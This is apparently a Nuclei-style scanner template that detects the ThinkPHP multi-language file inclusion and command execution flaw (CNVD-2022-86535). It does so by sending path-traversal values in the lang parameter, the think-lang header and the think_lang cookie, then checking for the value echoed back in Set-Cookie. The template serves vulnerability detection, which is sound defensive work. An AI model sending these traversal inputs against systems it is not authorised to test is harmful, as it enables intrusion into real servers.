id: CNVD-2022-86535
info:
  name: Thinkphp Multi Language File Inc And RCE
  author: arliya
  severity: high
  description: 'ThinkPHP is an open source lightweight PHP framework designed to simplify enterprise application development and agile WEB application development. ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.'
  reference: ["https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535"]
  tags: 'cnvd,cnvd2022,thinkphp,rce'

variables:
  random-path: "{{to_lower(rand_base(8))}}"

# The version with the bug will set the value of the parameter after lang to the cookie regardless of whether the file
# was successfully included, while the fixed version will return the language specified by the client accept-language
stop-at-first-match: true
requests:
# check by url
  - method: GET
    path:
      - "{{BaseURL}}/public/?lang=../../../../../public/{{random-path}}"
      - "{{BaseURL}}/index.php?lang=../../../../../public/{{random-path}}"
      - "{{BaseURL}}/?lang=../../../../../public/{{random-path}}"
    matchers:
    - type: word
      part: header
      words:
        - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}"
# check by header
  - method: GET
    path:
      - "{{BaseURL}}/public/index.php"
      - "{{BaseURL}}/index.php"
      - "{{BaseURL}}/"
    headers:
      think-lang: ../../../../../public/{{random-path}}
    matchers:
      - type: word
        part: header
        words:
          - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}"
# check by cookie
  - method: GET
    path:
      - "{{BaseURL}}/public/index.php"
      - "{{BaseURL}}/index.php"
      - "{{BaseURL}}/"
    headers:
      Cookie: think_lang=../../../../../public/{{random-path}}
    matchers:
    - type: word
      part: header
      words:
        - "Set-Cookie: think_lang=..%2F..%2F..%2F..%2F..%2Fpublic%2F{{random-path}}"
